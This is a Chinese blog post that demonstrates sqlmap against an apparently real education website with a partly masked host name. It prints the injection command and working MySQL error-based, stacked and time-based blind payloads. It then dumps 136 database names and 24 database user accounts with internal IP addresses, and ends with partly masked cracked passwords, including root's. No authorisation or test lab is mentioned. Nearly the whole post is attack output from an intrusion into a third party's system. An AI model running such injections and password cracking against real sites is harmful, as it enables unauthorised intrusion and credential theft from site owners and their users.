sqlmap神器实战篇（第一章）

分类：-InfoSecurity-, -Linux- | 发表于 2015年1月9日星期五下午5:15

发表评论

1.查找注入点：

D:\Python27\sqlmap>sqlmap.py -u http://xxcg.*****.com/learninglevel/SubjectDet

ail?id=35 --dbs

2.获取数据库

Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=35 AND (SELECT 2685 FROM(SELECT COUNT(*),CONCAT(0x7178626b71,(SE

LECT (CASE WHEN (2685=2685) THEN 1 ELSE 0 END)),0x71787a6271,FLOOR(RAND(0)*2))x

FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: stacked queries

Title: MySQL > 5.0.11 stacked queries

Payload: id=35; SELECT SLEEP(5)--

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=35 AND SLEEP(5)

---

[15:36:55] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5

back-end DBMS: MySQL 5.0

[15:36:55] [INFO] fetching database names

[15:36:55] [INFO] the SQL query used returns 136 entries

available databases [136]:

[*] beehive_listenread

[*] beehive_pointmall

[*] beehive_synchronwork

[*] beehive_voicespeech

[*] beehivedb

[*] bookcase

[*] ciwong_colorful

[*] ciwong_newsmanagement

[*] ciwong_qr

[*] cloudreader

[*] cmsdata

[*] cw_6v68_settlement

[*] cw_admin_elearning

[*] cw_admin_elearning_bak

[*] cw_app_store

[*] cw_audio_video_db

[*] cw_basedapplications

[*] cw_chinadream

[*] cw_cooperator

[*] cw_dw

[*] cw_edu

[*] cw_elearning

[*] cw_elearning_bak

[*] cw_englishshow

[*] cw_eshop_cart

[*] cw_eshop_common

[*] cw_eshop_news

[*] cw_eshop_order

[*] cw_eshop_product

[*] cw_eshop_user

[*] cw_gwy

[*] cw_hd

[*] cw_homepage

[*] cw_jibei

[*] cw_jibei_school

[*] cw_learnmonth

[*] cw_microvideo

[*] cw_netschool

[*] cw_packager_arithmetic

[*] cw_packager_arithmetic_en

[*] cw_packager_ebook

[*] cw_packager_experiment

[*] cw_packager_experiment_v2

[*] cw_packager_kousuan

[*] cw_packager_learning_level

[*] cw_packager_listenning_ch

[*] cw_packager_listenning_ch_v2

[*] cw_packager_listenning_en

[*] cw_packager_listenning_en_v2

[*] cw_packager_playwords

[*] cw_packager_reading_ch

[*] cw_packager_reading_en

[*] cw_packager_speaking_en

[*] cw_pay

[*] cw_press

[*] cw_press_new

[*] cw_recommend

[*] cw_resx_center

[*] cw_settlement

[*] cw_trainingdb

[*] cw_workcategory

[*] cw_workcategory_arithmetic

[*] cw_workcategory_arithmetic_en

[*] cw_workcategory_common

[*] cw_workcategory_ebook

[*] cw_workcategory_experience

[*] cw_workcategory_experiment

[*] cw_workcategory_experiment_v2

[*] cw_workcategory_learning_level

[*] cw_workcategory_listenning_ch

[*] cw_workcategory_listenning_ch_v2

[*] cw_workcategory_listenning_en

[*] cw_workcategory_listenning_en_v2

[*] cw_workcategory_more

[*] cw_workcategory_playwords

[*] cw_workcategory_reading_ch

[*] cw_workcategory_reading_en

[*] cw_workcategory_settings

[*] cw_workcategory_speaking_en

[*] cw_workshop

[*] cw_workshop2

[*] cw_yishang

[*] cw_yishang1

[*] cw_yishang_settle

[*] cw_ziyuan

[*] cwapi

[*] cwfav

[*] db_ciliao

[*] db_filestatus

[*] db_kousuan100

[*] db_statistics

[*] db_txb

[*] db_txb_paipai

[*] efficientclassroom

[*] enterprisestudy

[*] game

[*] gxktv3

[*] gxktv3_resource

[*] information

[*] information_schema

[*] microrecord

[*] mysql

[*] notebook_good

[*] notebook_mistake

[*] notebook_senten

[*] notebook_word

[*] performance_schema

[*] qc_ciwong

[*] quesdata

[*] research

[*] research_ky

[*] roompermissionjingsai

[*] schoolzone

[*] searcher

[*] synchpreparation

[*] szdsy2013

[*] t_db_areaconf

[*] t_db_jibei

[*] t_db_listening

[*] t_db_markham

[*] t_db_reportlog

[*] t_db_roomtask

[*] t_db_tinyurl

[*] test

[*] videouser

[*] wiki

[*] wikicommunity

[*] wikipoint

[*] wikiques

[*] wordstockchinese

[*] wordstockenglish

[*] wordstockenglishchangebuilding

[*] wordstockenglishchangeclassifying

[*] wordstockenglishchangescene

[*] wordstocktempresources

[*] work_listen

3.获取数据库中的用户

database management system users [24]:

[*] 'backup'@'192.168.1.101'

[*] 'backup'@'192.168.1.237'

[*] 'bkpuser'@'127.0.0.1'

[*] 'bruce'@'%'

[*] 'cacti'@'192.168.1.241'

[*] 'china_read'@'%'

[*] '*****'@'%'

[*] '***_it'@'%'

[*] 'leoxqing'@'192.168.1.241'

[*] 'repl'@'192.168.1.%'

[*] 'repl_ck'@'192.168.1.%'

[*] 'root'@'%'

[*] 'root'@'127.0.0.1'

[*] 'root'@'192.168.1.100'

[*] 'root'@'192.168.1.233'

[*] 'root'@'192.168.1.234'

[*] 'root'@'192.168.1.241'

[*] 'root'@'::1'

[*] 'root'@'localhost'

[*] 'videouser'@'%'

[*] 'webadmin_pac'@'%'

[*] 'wordchange'@'%'

[*] 'zhiligame'@'%'

[*] 'ziyuan'@'%'

最后密码也爆出来：

[15:17:27] [INFO] cracked password '***' for user 'videouser'

[15:17:27] [INFO] cracked password '***' for user 'backup'

[15:17:38] [INFO] using suffix '1'

[15:17:54] [INFO] using suffix '***'

[15:18:03] [INFO] cracked password 'object***' for user 'root'

[15:18:06] [INFO] cracked password 'zhiligame***' for user 'bkpuser'

本文来自：控企鹅的'Blog，永久链接：http://www.mrliangqi.com/101.html
标签：Sqlmap, 注入

发表评论

请登录后发表评论.

控企鹅的'Blog

sqlmap神器实战篇（第一章）

相关文章

发表评论

云标签

文章归档

友情链接

推荐阅读

T-Sql数据库语句的介绍和简单使用

Ettercap结合sslstrip对ssl/https进行攻击

Mysql5.6源码安装及其简单优化

Nginx性能优化配置实现高并发

Haproxy的配置及应用基础

最近评论

站点统计

联系我们

版权声明